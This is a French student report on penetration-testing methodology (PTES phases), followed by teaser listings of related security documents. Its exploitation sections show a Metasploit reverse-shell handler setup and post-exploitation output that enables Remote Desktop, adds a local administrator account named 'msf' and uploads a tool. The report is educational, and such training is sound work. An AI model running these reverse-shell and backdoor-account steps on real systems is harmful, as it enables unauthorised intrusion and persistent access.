TEST D INTRUISION. Document Technique

Dimension: px
Commencer à balayer dès la page:

Download "TEST D INTRUISION. Document Technique"

Transcription

1 Document Technique TEST D INTRUISION Préparé et présenté par AMINATA THIAM 3 ème année Sécurité de la Technologie de l Information, la Cité Collégiale Cours analyse des risques et vulnérabilités Mars 2012

2 TABLE DES MATIERES Sommaire 1. Introduction Les tests d intrusion Outils requis Les différentes phases du PTES Pré-engagement Collecte de renseignements... 4 Collecte d information passive... 4 Collecte d information active: Analyse de la vulnérabilité Exploitation Exploitation Message (POST) Rapport Conclusion Annexe... 8

3 1. Introduction «L'information s'impose comme un des capitaux les plus précieux pour l'organisation». Le système d'information est essentiel à l'activité d une organisation. Il est donc vital de protéger ce patrimoine; cependant un faible niveau de sécurité peut engendrer des dommages sérieux à une organisation. Pour remédier ou prévenir à un tel désastre, il faut soi-même (l entreprise) faire des tests d intrusion de son système d information ou en conférer la charge à un organisme compétant. Les tests d intrusion sont un «sujet enclin et récurrent de la sécurité informatique : ils existent en théorie depuis toujours mais ne cessent d évoluer, en fonction des nouvelles familles de vulnérabilités, mais aussi en fonction des modes». 2. Les tests d intrusion Ils consistent généralement à simuler une attaque d'un utilisateur malveillant et à analyser les risques potentiels dus à : la conception de l'architecture une mauvaise configuration d'un système la robustesse des composants un défaut de programmation une vulnérabilité liée à la solution testée les procédures d'exploitation et d administration. Dans notre cas, nous allons nous mettre dans la peau du pirate pour mener à bien ce test et ainsi nous montrerons à chaque fois quelques exemples. Le principal but de cette manœuvre est de trouver des vulnérabilités exploitables en vue de proposer un plan d'actions permettant d'améliorer la sécurité de nos systèmes. 3. Outils requis Quelques pré-requis sont nécessaires : Une bonne connaissance des réseaux : routage, protocoles IP, architectures, etc. Une connaissance des systèmes (Linux, Unix, Windows, Mac, ), Une bonne pratique des architectures applicatives et des applications actuelles (serveurs Web, middlewares, bases de données, ). Ensuite, il est nécessaire de se constituer une plate-forme d intrusion (Dans notre cas BT5) Des outils de tests automatisés, comme (Nessus, Nexpose)

4 4. Les différentes phases du PTES 4.1 Pré-engagement Cette réunion d initialisation, permet de : donner une vision claire de la procédure des opérations poser les limites sur l étendu du test Établir la portée (nombre de machines?, liste des serveurs, répartition géographique) Les méthodes d attaque sont aussi soumises, par exemple, le fait d avoir le droit ou non d utiliser les techniques d ingénierie sociales sur les employés, et si oui, par quels vecteurs Établir la durée et l échéancier Établir les intervenants (en cas d urgence, communication lors du test ) 4.2 Collecte de renseignements Cette phase consiste à cueillir des informations sur l organisation et les éventuelles vulnérabilités de son système d informations. Elle se divise en deux parties: Collecte d information passive «foot printing»: cette méthode nous procure les informations ci-dessous : Type d information Outils IP, Serveur DNS Whois Adresse courriel google, theharvester.py, facebook Nom d usager Google, méta données Site web EXEMPLE :

5 Collecte d information active: sert à identifier le système d exploitation et les «patches» qui ont été appliqué: balayage de ports etc. Type d information Il permet de savoir quels sont les ports ouverts, fermés ou filtrés, ainsi que le système d exploitation et sa version. permet d obtenir des comptes valides. Outils Nmap nmap -O Finger Exemple : Nom d usager Site web Google, méta données Google 4.3 Analyse de la vulnérabilité Cette démarche nous fournit les informations nécessaires au développement de stratégies d atténuation, d intervention et de rétablissement. De ce fait, nous allons nous penché sur quels sont les actifs? Comment accède t on la cible? Comment se servir des exploits à partir de l information trouvée précédemment. Une analyse de type : Il existe un grand nombre de menaces : (Interne, Externe, Administrateur corrompu) Quelles sont les menaces qu il serait intéressant de représenter? Trouver des vulnérabilités existantes (manuellement/scanner) Balayage réseau (Nexpose)

6 Balayage réseau (Nessus) Balayage Web (Netsparker) Metasploit scanner (Metasploit Unleashed) Recherche de nouveaux exploits ou 0-day attacks (sites spécialisés) Test des exploits contre le système d antivirus utilisé Exemple : Basic scan : /opt/framework/msf3/# nc Avec l outil Nexpose /etc/init.d/nexposeconsole.rc start Nexpose avec Msfconsole: msf > nexpose_connect ok msf > load nexpose msf > nexpose_scan msf > hosts c address msf > vulns Nexpose avec GUI https:// :3780 LISTE DES VULNERABILITES Vulnerability Listing Vulnerability Severity Instances Apache httpd mod_isapi module unload flaw (CVE ) Critical 4 MySQL yassl CertDecoder::GetName Multiple Buffer Overflows Critical 1 PHP Fixed SplObjectStorage unserialization problems Critical 1 PHP Integer overflow in shmop_read( Critical 1 PHP format-string vulnerability on Phar Critical 1 PHP use-after-free in substr_replace() Critical 1 PHP Fixed stack buffer overflow in socket_connect() Critical 1 PHP Fixed MOPS Severe 1 PHP utf8_decode vulnerabilities and deficiencies in the number of reported malformed sequences Severe 1 PHP File path injection vulnerability in RFC1867 File upload filename Severe 1 MySQL Directory Traversal and Arbitrary Table Access Vulnerability Severe 1 MySQL COM_FIELD_LIST Command Buffer Overflow Vulnerability Severe 1 DNS server allows cache snooping Severe 2! 4.4 Exploitation Cette phase a pour objectif d exploiter les vulnérabilités trouvées dans la phase précédente dans le but de s introduire sur les machines. Dans le cas d une intrusion, on doit prouver l intrusion :

7 En fournissant par exemple les informations confidentielles du système d information. En démontrant qu on a pu écrire ou modifier les données Exemple msfconsole msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST => smsf exploit(handler) > set LPORT 443 LPORT => 443 exploit(handler) > load auto_add_route [*] Successfully loaded plugin: auto_add_route msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on :443 [*] Starting the payload handler... msf exploit(handler) > 4.5 Exploitation Message (POST) Dans cette phase, nous allons pivoter à travers une vulnérabilité pour accéder à d autres machines ou services. Exemple : Meterpreter meterpreter > run getgui -e -f 8080 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] Terminal Services service is already set to auto [*] Opening port in local firewall if necessary [*] Starting the port forwarding at local port 8080 [*] Local TCP relay created: :8080 <-> :3389 meterpreter > shell Process 2480 created. Channel 6 created. Microsoft Windows XP [Version ] (C) Copyright Microsoft Corp. C:\WINDOWS\system32>net user msf metasploit /add net user msf metasploit /ADD The command completed successfully.

8 C:\WINDOWS\system32>net localgroup administrators msf /add net localgroup administrators msf /add The command completed successfully. C:\WINDOWS\system32> C:\WINDOWS\system32>^Z Background channel 6? [y/n] y meterpreter > upload nmap.exe [*] uploading : nmap.exe -> nmap.exe [*] uploaded : nmap.exe -> nmap.exe meterpreter > 5. Rapport Le rapport contient une description précise de la visibilité de la plate-forme à partir de de l extérieur, une liste des vulnérabilités identifiées et cataloguées accompagnée par les mesures à prendre pour la corriger. Enfin, les risques résiduels éventuels sont aussi présentés et qualifiés. (Un modèle de rapport en annexe) 6. Conclusion Les tests d intrusion sont nécessaires, surtout avant la mise en ligne d un nouveau système car c est le moyen qui permet de s assurer de son niveau de sécurité vis-à-vis de l extérieur, ainsi, chaque test d intrusion découle un niveau de sécurité croissant. 7. Annexe Rapport.pdf

Table des matières. Avant-propos... Préface... XIII. Remerciements...

Table des matières. Avant-propos... Préface... XIII. Remerciements... Avant-propos... XI Préface... XIII Remerciements... XV Introduction... XVII Pourquoi faire un pentest?... XVII Pourquoi Metasploit?... XVII Un bref historique de Metasploit.... XVIII À propos de ce livre...

Plus en détail

Formation en Sécurité Informatique

Formation en Sécurité Informatique Formation en Sécurité Informatique FreeWays Security Club MAIL: KHALDIMEDAMINE@GMAIL.COM Contenu 1- Comprendre le terrain 2- Metasploit 3- NeXpose a- Installation du serveur NeXpose b- IHM de la console

Plus en détail

SECURIDAY 2012 Pro Edition

SECURIDAY 2012 Pro Edition SECURINETS CLUB DE LA SECURITE INFORMATIQUE INSAT SECURIDAY 2012 Pro Edition [Information Gathering via Metasploit] Chef Atelier : Nihel AKREMI (RT 3) Baha Eddine BOUKHZAR(RT 2) Sana GADDOUMI (RT 4) Safa

Plus en détail

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3) Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3) Table des matières 1. Présentation de l atelier... 2 2. Présentation des outils utilisés... 2 a. GNS3

Plus en détail

Tutoriel sur Retina Network Security Scanner

Tutoriel sur Retina Network Security Scanner Département de Mathématiques Informatique Master 2 RIP filière «Réseaux» Cours «Sécurité des réseaux et des contenus multimédia» Responsable du module : Mr Osman SALEM Tutoriel sur Retina Network Security

Plus en détail

Sécurité Informatique : Metasploit

Sécurité Informatique : Metasploit Sécurité Informatique : Metasploit Par Brandon ROL Veille Technologique La veille technologique consiste à s'informer de façon systématique sur les techniques les plus récentes et surtout sur leur mise

Plus en détail

Fonctionnement de Iptables. Exercices sécurité. Exercice 1

Fonctionnement de Iptables. Exercices sécurité. Exercice 1 Exercice 1 Exercices sécurité 1. Parmi les affirmations suivantes, lesquelles correspondent à des (bonnes) stratégies de défenses? a) Il vaut mieux interdire tout ce qui n'est pas explicitement permis.

Plus en détail

Le piratage: À la portée de tout le monde? 2010 Michel Cusin 1

Le piratage: À la portée de tout le monde? 2010 Michel Cusin 1 Le piratage: À la portée de tout le monde? 2010 Michel Cusin 1 Agenda de la présentation Les attaquants et leurs motivations Les différentes provenances et sortes d attaques Les étapes d une attaque Les

Plus en détail

Introduction. Pourquoi faire un pentest? Pourquoi Metasploit?

Introduction. Pourquoi faire un pentest? Pourquoi Metasploit? Introduction Imaginez que dans quelque temps, dans un futur pas si lointain, un attaquant décide d attaquer les biens digitaux d une multinationale, ciblant des droits de propriété intellectuelle de plusieurs

Plus en détail

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE 19 mars 2013 (Révision 3) Sommaire Présentation 3 Nessus 3 Détection des programmes malveillants... 3 Détection des réseaux

Plus en détail

Audits Sécurité. Des architectures complexes

Audits Sécurité. Des architectures complexes Audits Sécurité Des architectures complexes L avènement d Internet et le développement des applications Intranet/Extranet ont permis aux entreprises d accroître leur compétitivité par l ouverture de leurs

Plus en détail

FORMATION PROFESSIONNELLE AU HACKING

FORMATION PROFESSIONNELLE AU HACKING FORMATION PROFESSIONNELLE AU HACKING BRIEFING Dans un monde où la science et la technologie évolue de façons exponentielle, les informaticiens et surtout les administrateurs des systèmes informatique (Réseau,

Plus en détail

WDpStats Procédure d installation

WDpStats Procédure d installation WDpStats Procédure d installation Table de matières WDpStats... 1 Procédure d installation... 1 Table de matières... 1 Résumé... 2 Réquisits... 2 Installation... 2 Difficultés... 6 Lancement... 7 wdpstats_install_oracle_fr.xml

Plus en détail

Netdays 2004. Comprendre et prévenir les risques liés aux codes malicieux

Netdays 2004. Comprendre et prévenir les risques liés aux codes malicieux 1 Netdays 2004 Comprendre et prévenir les risques liés aux codes malicieux 2 Comprendre et prévenir les risques liés aux codes malicieux - Motivations - Les principaux types de codes malicieux - Les principales

Plus en détail

Le scan de vulnérabilité

Le scan de vulnérabilité 4 Le scan de vulnérabilité Sommaire Le scan de vulnérabilité de base Scan avec NeXpose L assistant "nouveau site" Le nouvel assistant pour les scans manuels Scan avec Nessus Scanners de vulnérabilité spécialisés

Plus en détail

CHEF ATELIER CHEF ATELIER

CHEF ATELIER CHEF ATELIER Mobile Exploitation CHEF ATELIER : MERIEM MEMMICHE (RT3) SARAH LOUSSAIEF(RT3) OUSSEMA BEN GHROBEL EMNA MANNAI (RT3) ALY MESSAOUDI (RT3) TARAK CHAABOUNI (RT3) Table des matières 1. Présentation de l atelier......

Plus en détail

IPS : Corrélation de vulnérabilités et Prévention des menaces

IPS : Corrélation de vulnérabilités et Prévention des menaces IPS : Corrélation de vulnérabilités et Prévention des menaces SIM+IPS opensource David Bizeul & Alexis Caurette C O N N E C T I N G B U S I N E S S & T E C H N O L O G Y Définitions SIM : Security Information

Plus en détail

SECURIDAY 2013 Cyber War

SECURIDAY 2013 Cyber War Club de la Sécurité Informatique à l INSAT Dans le cadre de la 3ème édition de la journée nationale de la sécurité informatique SECURIDAY 2013 Cyber War SECURINETS Présente Formateurs: 1. Trabelsi NAJET

Plus en détail

Les différentes méthodes pour se connecter

Les différentes méthodes pour se connecter Les différentes méthodes pour se connecter Il y a plusieurs méthodes pour se connecter à l environnement vsphere 4 : en connexion locale sur le serveur ESX ; avec vsphere Client pour une connexion sur

Plus en détail

Techniques actuelles d'attaque IP

Techniques actuelles d'attaque IP Mélée Numérique 18 mars 2003 Techniques actuelles d'attaque IP 8 années d'expérience en test d'intrusion Stéphane Aubert Stephane.Aubert@hsc.fr Hervé Schauer Consultants 1 Hervé Schauer Consultants Cabinet

Plus en détail

Création d un «Web Worm»

Création d un «Web Worm» Création d un «Web Worm» Exploitation automatisée des failles web Simon Marechal Thales Security Systems Consultant Risk Management 1 Création d un ver exploitant une faille web 1.1 Introduction Les applications

Plus en détail

Visualisation appliquée à la détection d intrusions

Visualisation appliquée à la détection d intrusions Visualisation appliquée à la détection d intrusions Pierre Chifflier Sébastien Tricaud INL 101/103 Bvd MacDonald 75019 Paris, France Paris, OSSIR 2008 Sommaire 1 Introduction aux IDS Petit tour de la détection

Plus en détail

Les risques HERVE SCHAUER HSC

Les risques HERVE SCHAUER HSC HERVE SCHAUER HSC Les risques Les risques ne cessent d'augmenter: Informatisation systématique de l'ensemble de la société Ouverture des systèmes d'information sur Internet Démultiplication de ce qui est

Plus en détail

ALOHA LOAD BALANCER MICROSOFT TERMINAL SERVICES LOAD-BALANCING AVEC SESSION BROKER

ALOHA LOAD BALANCER MICROSOFT TERMINAL SERVICES LOAD-BALANCING AVEC SESSION BROKER ALOHA LOAD BALANCER MICROSOFT TERMINAL SERVICES LOAD-BALANCING AVEC SESSION BROKER APPNOTE #0051 TERMINAL SERVICES LOAD-BALANCING AVEC SESSION BROKER Cette note technique vous guidera pour l implémentation

Plus en détail

Guide d installation JMap 5.0

Guide d installation JMap 5.0 Guide d installation JMap 5.0 Installation de JMap L installation de JMap se fait typiquement sur un serveur qui sera accédé par l ensemble des utilisateurs. Lors de l installation, toutes des composantes

Plus en détail

4-441-095-22 (1) Network Camera

4-441-095-22 (1) Network Camera 4-441-095-22 (1) Network Camera Guide de l outil SNC easy IP setup Logiciel version 1.0 Avant d utiliser cet appareil, lisez attentivement ce manuel et conservez-le pour vous y reporter ultérieurement.

Plus en détail

Par Mauro Israel coordinateur du Cercle de la Sécurité et des Systèmes d Information. Les frères «Térieur» : Alain et Alex

Par Mauro Israel coordinateur du Cercle de la Sécurité et des Systèmes d Information. Les frères «Térieur» : Alain et Alex Quelques tabous & totems de la sécurité revisités Par Mauro Israel coordinateur du Cercle de la Sécurité et des Systèmes d Information Les frères «Térieur» : Alain et Alex Tabou numéro 2 : Le firewall

Plus en détail

Sécurité des systèmes d exploitation

Sécurité des systèmes d exploitation Sécurité des systèmes d exploitation Jean-Marc Robert Génie logiciel et des TI Plan de la présentation Systèmes d exploitation Microsoft XP, Vista, 7, Unix/Linux MAC Conclusion Jean-Marc Robert, ETS Sécurité

Plus en détail

Sécurité des réseaux Les attaques

Sécurité des réseaux Les attaques Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques

Plus en détail

Solutions McAfee pour la sécurité des serveurs

Solutions McAfee pour la sécurité des serveurs Solutions pour la sécurité des serveurs Sécurisez les charges de travail des serveurs avec une incidence minime sur les performances et toute l'efficacité d'une gestion intégrée. Imaginez que vous ayez

Plus en détail

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité 1. Présentation Nmap est un outil open source d'exploration réseau et d'audit de sécurité, utilisé pour scanner de grands

Plus en détail

Audits de sécurité, supervision en continu Renaud Deraison

Audits de sécurité, supervision en continu Renaud Deraison Audits de sécurité, supervision en continu Renaud Deraison Bio (en deux phrases) Auteur du logiciel Nessus (1998 -) Co-fondateur de Tenable Network Security, Inc. (Maryland, 2002 -) Tenable La société

Plus en détail

Outils d'analyse de la sécurité des réseaux. HADJALI Anis VESA Vlad

Outils d'analyse de la sécurité des réseaux. HADJALI Anis VESA Vlad Outils d'analyse de la sécurité des réseaux HADJALI Anis VESA Vlad Plan Introduction Scanneurs de port Les systèmes de détection d'intrusion (SDI) Les renifleurs (sniffer) Exemples d'utilisation Conclusions

Plus en détail

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation Objectif : Tout administrateur système et réseau souhaitant avoir une vision d'ensemble des problèmes de sécurité informatique et des solutions existantes dans l'environnement Linux. Prérequis : Connaissance

Plus en détail

Sécurité de la ToIP Mercredi 16 Décembre 2009. CONIX Telecom eric.assaraf@conix.fr

Sécurité de la ToIP Mercredi 16 Décembre 2009. CONIX Telecom eric.assaraf@conix.fr Sécurité de la ToIP Mercredi 16 Décembre 2009 CONIX Telecom eric.assaraf@conix.fr Téléphonie sur IP vs téléphonie classique Quel est le niveau de sécurité de la téléphonie classique? 2 La différence c

Plus en détail

La Pédagogie au service de la Technologie

La Pédagogie au service de la Technologie La Pédagogie au service de la Technologie TECHNOLOGIE Formation Symantec Endpoint Protection 12.1 Administration Objectif >> A la fin de ce cours, les stagiaires seront à même d effectuer les tâches suivantes

Plus en détail

CHFI CHFI CISSP. Penetration t. Penetration testing. Microsoft CISCO. ical Hacker. Certified Ethical Hacker. CATALOGUE FORMATION Année 2010 / 2011

CHFI CHFI CISSP. Penetration t. Penetration testing. Microsoft CISCO. ical Hacker. Certified Ethical Hacker. CATALOGUE FORMATION Année 2010 / 2011 CATALOGUE FORMATION Année 2010 / 2011 Certified Ethical Hacker Penetration testing tified CHFI Ethical Hacker CHFI Management de la sécurité des SI ical Hacker Penetration t CISSP CISSP Ethical Hacker

Plus en détail

La gestion des vulnérabilités par des simulations d'attaques

La gestion des vulnérabilités par des simulations d'attaques La gestion des vulnérabilités par des simulations d'attaques Philippe Oechslin, Objectif Sécurité Eric Choffat, Serono Cette présentation est disponible sur inforum.biz Introduction o Objectif Sécurité

Plus en détail

La sécurité applicative et les tests d'intrusion, beaucoup plus qu'un scan automatisé. Conférence ASIQ, mars 2014

La sécurité applicative et les tests d'intrusion, beaucoup plus qu'un scan automatisé. Conférence ASIQ, mars 2014 La sécurité applicative et les tests d'intrusion, beaucoup plus qu'un scan automatisé Conférence ASIQ, mars 2014 www.hackfest.ca AINSI, CE QUI EST D UNE IMPORTANCE SUPRÊME DANS LA GUERRE, C EST D ATTAQUER

Plus en détail

Guide d installation de SugarCRM Open Source version 4.5.1

Guide d installation de SugarCRM Open Source version 4.5.1 Guide d installation de SugarCRM Open Source version 4.5.1 Version 1.0.2 Mentions légales Mentions légales Ce document est susceptible de modification à tout moment sans notification. Disclaimer / Responsabilité

Plus en détail

Installation de Scale Pos Office

Installation de Scale Pos Office Requis : Connexion internet pour l activation du logiciel ( une seule activation possible ) Le process d activation nécessite une connexion ethernet filaire à internet, ou au minimum une carte ethernet

Plus en détail

INTRUSION SUR INTERNET

INTRUSION SUR INTERNET INTRUSION SUR INTERNET Filière Télécommunication Laboratoire de Transmission de Données Diplômant : Marfil Miguel Professeur : Gérald Litzistorf En collaboration : Banque Pictet, Lanrent Dutheil e-xpert

Plus en détail

SUPERVISION DE RÉSEAU AVEC NAGIOS

SUPERVISION DE RÉSEAU AVEC NAGIOS SUPERVISION DE RÉSEAU AVEC NAGIOS Auteur : Henri TSOUNGUI, H.T. Lille, dec. 2006 Utilitaires : nagios 1.4 pour le premier superviseur, nagios 1.1 et nagat 1.02 pour le 2 ème superviseur 1.Contexte et objectifs

Plus en détail

Sensibilisation à la sécurité informatique

Sensibilisation à la sécurité informatique Sensibilisation à la sécurité informatique Michel Salomon IUT de Belfort-Montbéliard Département d informatique Michel Salomon Sécurité 1 / 25 Sensibilisation à la sécurité informatique Généralités et

Plus en détail

INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez

INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez Directives : - La date de remise est Mercredi le 26 mars 2007 à 12h, *VOIR I STRUCTIO S DÉTAILLÉES DE REMISE

Plus en détail

Guide Installation Serveur Extensive Testing

Guide Installation Serveur Extensive Testing Sommaire Installation simple sur un système vierge... 2 Installation personnalisée sur un système vierge... 3 Restauration du produit avec une version antérieure... 5 Mise à jour du produit... 6 Déployer

Plus en détail

Guide Installation Serveur Extensive Testing

Guide Installation Serveur Extensive Testing Sommaire Installation sur un système vierge... 1 Mise à jour du produit... 4 Déployer un nouveau client Windows... 5 Déployer un nouveau client Linux... 5 Auteur : Denis Machard Date : 22/03/2015 Version

Plus en détail

CSI351 Systèmes d exploitation Instructions pour rouler Linux avec Virtual PC dans la salle de labo 2052

CSI351 Systèmes d exploitation Instructions pour rouler Linux avec Virtual PC dans la salle de labo 2052 CSI351 Systèmes d exploitation Instructions pour rouler Linux avec Virtual PC dans la salle de labo 2052 Une machine virtuelle Linux, appelé SiteDev (version 9 de Redhat) peut être roulé avec Virtual PC

Plus en détail

TP 1 - Prise de contact avec Snort, scapy

TP 1 - Prise de contact avec Snort, scapy TP 1 - Prise de contact avec Snort, scapy 0. Initialisation du TP Installer les paquets python-scapy, snort, nmap. 1. Présentation de SNORT v2.8.5 La détection d intrusion consiste en un ensemble de techniques

Plus en détail

Table des matières. 1. Installation de VMware ESXI 4... 3. 1.1. Pré-requis... 3. 1.2. Installation... 3

Table des matières. 1. Installation de VMware ESXI 4... 3. 1.1. Pré-requis... 3. 1.2. Installation... 3 Table des matières 1. Installation de VMware ESXI 4.... 3 1.1. Pré-requis... 3 1.2. Installation... 3 1.2.1. Panneau de configuration du serveur ESXI... 4 1.2.2. Configuration du mot de passe «Root»....

Plus en détail

ModSecurity. Cible de sécurité CSPN Version 0.96

ModSecurity. Cible de sécurité CSPN Version 0.96 Cible de sécurité CSPN Version 0.96 TABLE DES MATIERES 1 IDENTIFICATION... 3 1.1 IDENTIFICATION DE LA CIBLE DE SECURITE... 3 1.2 IDENTIFICATION DU PRODUIT... 3 2 ARGUMENTAIRE (DESCRIPTION) DU PRODUIT...

Plus en détail

Atelier Sécurité / OSSIR

Atelier Sécurité / OSSIR Atelier Sécurité / OSSIR Présentation Produits eeye SecureIIS Retina elorrain@eeye.com & broussel@eeye.com Sommaire Page 2 Qui sommes nous? SecureIIS Protection Web Retina Scanner de Sécurité Questions

Plus en détail

WDpStats Procédure d installation

WDpStats Procédure d installation WDpStats Procédure d installation Table de matières WDpStats... 1 Procédure d installation... 1 Table de matières... 1 Résumé... 2 Réquisits... 2 Installation... 2 Difficultés... 7 Lancement... 8 wdpstats_install_sqlserver_fr.xml

Plus en détail

acpro SEN TR firewall IPTABLES

acpro SEN TR firewall IPTABLES B version acpro SEN TR firewall IPTABLES du 17/01/2009 Installation du routeur firewall iptables Nom : Prénom : Classe : Date : Appréciation : Note : Objectifs : - Être capable d'installer le service de

Plus en détail

Protection des protocoles www.ofppt.info

Protection des protocoles www.ofppt.info ROYAUME DU MAROC Office de la Formation Professionnelle et de la Promotion du Travail Protection des protocoles DIRECTION RECHERCHE ET INGENIERIE DE FORMATION SECTEUR NTIC Sommaire 1. Introduction... 2

Plus en détail

Firewall IDS Architecture. Assurer le contrôle des connexions au. nicolas.hernandez@univ-nantes.fr Sécurité 1

Firewall IDS Architecture. Assurer le contrôle des connexions au. nicolas.hernandez@univ-nantes.fr Sécurité 1 Sécurité Firewall IDS Architecture sécurisée d un réseau Assurer le contrôle des connexions au réseau nicolas.hernandez@univ-nantes.fr Sécurité 1 Sommaire général Mise en oeuvre d une politique de sécurité

Plus en détail

INSTALLATION NG V2.1 D OCS INVENTORY. Procédure d utilisation. Auteur : GALLEGO Cédric 23/10/2014 N version : v1

INSTALLATION NG V2.1 D OCS INVENTORY. Procédure d utilisation. Auteur : GALLEGO Cédric 23/10/2014 N version : v1 INSTALLATION D OCS INVENTORY NG V2.1 Procédure d utilisation Installation d OCS Inventory NG (Open Computer and Software Inventory) sur un serveur Linux N version : v1 Installation d OCS Inventory NG v2.1

Plus en détail

BTS INFORMATIQUE DE GESTION Administrateur des réseaux locaux d entreprise

BTS INFORMATIQUE DE GESTION Administrateur des réseaux locaux d entreprise BTS INFORMATIQUE DE GESTION Administrateur des réseaux locaux d entreprise EPREUVE E5 : PRATIQUE DES TECHNIQUES INFORMATIQUES Identité du candidat : PAPIN Perrine N d inscription : M326070463 ACTIVITE

Plus en détail

Présentation et portée du cours : CCNA Exploration v4.0

Présentation et portée du cours : CCNA Exploration v4.0 Présentation et portée du cours : CCNA Exploration v4.0 Dernière mise à jour le 3 décembre 2007 Profil des participants Le cours CCNA Exploration s adresse aux participants du programme Cisco Networking

Plus en détail

Projet Sécurité STRI M2 Attack Team

Projet Sécurité STRI M2 Attack Team Projet Sécurité STRI M2 Attack Team BERGE Romain DESPOUY Armel FAURE Patrice LABACH Frédéric LASTIRI Xavier LEVY Olivier NAANANI Ihsane SEGUES Jordi IUP STRI M2 Promo 2007 1 Plan Introduction Organisation

Plus en détail

DenyAll Detect. Documentation technique 27/07/2015

DenyAll Detect. Documentation technique 27/07/2015 DenyAll Detect Documentation technique 27/07/2015 Sommaire 1. A propos de ce document... 3 1.1 Objet... 3 1.2 Historique... 3 1.3 Contexte... 3 2. Liste des tests... 4 2.1 Découverte réseau (scan de ports)...

Plus en détail

1/ Introduction. 2/ Schéma du réseau

1/ Introduction. 2/ Schéma du réseau 1/ Introduction FWBuilder est un logiciel-libre multi-plateforme qui permet de créer ses propres pare-feux et les utiliser sur différents SE ou sur du matériel informatique. Objectif : Créer un pare-feu

Plus en détail

GlobalScape Secure FTP Server 3.0.2 Buffer Overflow

GlobalScape Secure FTP Server 3.0.2 Buffer Overflow GlobalScape Secure FTP Server 3.0.2 Buffer Overflow muts@whitehat.co.il Traduction française: jerome[at]athias.fr http://www.athias.fr/jerome/doc/ Qu est-ce que le Serveur FTP Sécurisé GlobalScape?...

Plus en détail

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est

Plus en détail

AMESD-Puma2010-EFTS- Configuration-update-TEN (en-fr)

AMESD-Puma2010-EFTS- Configuration-update-TEN (en-fr) AMESD-Puma2010-EFTS- Configuration-update-TEN (en-fr) Doc.No. : EUM/OPS/TEN/13/706466 Issue : v3 Date : 7 May 2014 WBS : EUMETSAT Eumetsat-Allee 1, D-64295 Darmstadt, Germany Tel: +49 6151 807-7 Fax: +49

Plus en détail

SECURIDAY 2012 Pro Edition

SECURIDAY 2012 Pro Edition SECURINETS CLUB DE LA SECURITE INFORMATIQUE INSAT SECURIDAY 2012 Pro Edition Exploitation des failles via METASPLOIT Chef Atelier : Med Taher BEN SALEM (RT3) Slim BOUGHENIA(Esprit) Karim BENZINA(RT4) MounaFELAH(RT3)

Plus en détail

Le Centre canadien de réponse aux incidents cybernétiques (CCRIC)

Le Centre canadien de réponse aux incidents cybernétiques (CCRIC) Le Centre canadien de réponse aux incidents cybernétiques (CCRIC) Mai 2014 Stratégie de cybersécurité du Canada Depuis la publication de la Stratégie de cybersécurité du Canada en 2010, Sécurité publique

Plus en détail

CATALOGUE de formation

CATALOGUE de formation CATALOGUE de formation Pôles formation Formation Management des SI Formation Technique Formation bureautique Date : 2013-2014 Maison de la Formation Professionnelle Page # L offre MFP Formation Management

Plus en détail

Prise en compte des informations de veille et d alerte d

Prise en compte des informations de veille et d alerte d Prise en compte des informations de veille et d alerte d Cert-IST dans un workflow structuré Cert-IST Juin 2006 Agenda Le workflow? Quelles sont les diffusions du Cert-IST concernées Comment a-t-on adapté

Plus en détail

La sécurité informatique du point de vue d un pirate. Société GRICS

La sécurité informatique du point de vue d un pirate. Société GRICS La sécurité informatique du point de vue d un pirate Par : Éric Ledoux Société GRICS Plan de la présentation Introduction Obligation légale Deux approches en sécurité Approche «corporative» Approche «pirate»

Plus en détail

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 A t t a q u e s c o n t r e l e s a p p l i s w e b cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 D e l ' u t i l i t é d e l ' a t t a

Plus en détail

par BALLAN Emilie et SURANGKANJANAJAI Gaëtan disponible en ligne : http://www.e eck.org/

par BALLAN Emilie et SURANGKANJANAJAI Gaëtan disponible en ligne : http://www.e eck.org/ Dénis de Service et usurpation d'identité par BALLAN Emilie et SURANGKANJANAJAI Gaëtan disponible en ligne : http://www.e eck.org/ PLAN Introduction Dénis de service: Tcp Syn Land Teardrop Smurf Ping de

Plus en détail

Apache Tomcat 8 Guide d'administration du serveur Java EE 7 sous Windows et Linux

